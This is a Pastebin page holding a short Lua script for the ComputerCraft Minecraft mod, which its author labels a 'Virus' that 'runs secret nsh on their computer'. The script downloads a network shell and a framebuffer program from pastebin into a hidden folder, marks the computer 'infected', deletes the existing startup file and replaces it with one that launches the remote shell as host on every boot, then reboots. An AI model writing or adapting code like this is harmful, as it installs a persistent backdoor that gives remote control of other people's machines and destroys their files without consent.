Advertisement
sethxi

Untitled

Apr 11th, 2015
213
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.53 KB | None | 0 0
  1. -- Virus
  2. -- by Liquid Obsidian
  3. -- Runs secret nsh on their computer.
  4.  
  5. term.clear()
  6.  
  7. shell.run("mkdir /.virus/")
  8. shell.run("pastebin get Zgp9L8vX /.virus/nsh")
  9. shell.run("pastebin get Aaza6h5v /.virus/framebuffer")
  10. shell.run("label set infected")
  11.  
  12. if(fs.exists("/startup")) then
  13. fs.delete("/startup")
  14. end
  15.  
  16. local f = fs.open("startup", "w")
  17. f.write("shell.run('.virus/nsh host')")
  18. f.close()
  19.  
  20. term.clear()
  21. term.setCursorPos(1, 1)
  22. term.setTextColor(colors.red)
  23. term.write(os.getComputerID())
  24.  
  25. sleep(.5)
  26.  
  27. os.reboot()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement